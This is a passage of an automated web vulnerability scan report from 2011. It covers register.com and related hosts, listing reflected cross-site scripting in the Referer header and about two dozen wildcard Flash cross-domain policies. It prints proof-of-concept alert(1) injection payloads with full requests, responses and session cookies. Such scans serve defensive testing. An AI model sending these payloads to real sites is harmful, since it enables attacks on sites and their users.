Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:12:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=71D10E28389822DF56D6996222F9628D.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=2eebf6c5fd804083704d9b02ca9b3f46abf8bee842bc06ca4e62a5cd60ac0ec50a2f7973; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31335
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=35db8"-alert(1)-"435739ce645";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.26. http://www.register.com/unauthenticated_session_expired.rcmx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.register.com
Path:   /unauthenticated_session_expired.rcmx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2064"-alert(1)-"625a6b7fc7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unauthenticated_session_expired.rcmx?opener=/domain/searchresults.rcmx HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=session#1315085400638-452340#1315087347|PC#1315085400638-452340.19#1317677487|check#true#1315085547; OAX=Mhd7ak5inIsACxRd; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.2.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:14:57 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23259
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <meta http-equiv="Content
...[SNIP]...
prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.google.com/search?hl=en&q=e2064"-alert(1)-"625a6b7fc7b";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 29 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://adx.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.2. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sat, 03 Sep 2011 23:16:57 GMT
Date: Fri, 02 Sep 2011 23:16:57 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 80212

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.3. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729062000"
Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sat, 03 Sep 2011 21:33:49 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.4. http://c.mouseflow.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.mouseflow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.mouseflow.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 20 Apr 2011 14:02:32 GMT
Accept-Ranges: bytes
ETag: "3e38109863ffcb1:0"
Server: Microsoft-IIS/7.5
Date: Sat, 03 Sep 2011 21:34:45 GMT
Connection: close
Content-Length: 103

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5087
Date: Sat, 03 Sep 2011 21:40:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.6. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.7. http://d.adroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:38:09 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.8. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sat, 03 Sep 2011 21:40:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.9. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2079
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.10. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.11. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://imagesak.securepaynet.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagesak.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesak.securepaynet.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:46:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.13. http://img1.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img1.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:30:11 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.14. http://img3.wsimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img3.wsimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.15. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.16. http://registercom.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registercom.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: registercom.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 03 Sep 2011 21:32:02 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.17. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 03 Sep 2011 21:33:54 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.18. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.19. http://value.register.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://value.register.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:56 GMT
Server: Omniture DC/2.0.0
xserver: www264
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.20. http://www.wunderground.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:30 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 03 Mar 2011 23:03:36 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.21. http://ads.lfstmedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.lfstmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.lfstmedia.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 03 Sep 2011 21:40:39 GMT
Content-Type: text/xml
Content-Length: 376
Last-Modified: Sat, 03 Sep 2011 21:33:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.dmajet.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lifestreetmedia.com" secure="false"/>
...[SNIP]...

5.22. http://edge.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://edge.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Sat, 03 Sep 2011 21:36:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.23. http://login.dotomi.com/crossdomain.xml  previous  next

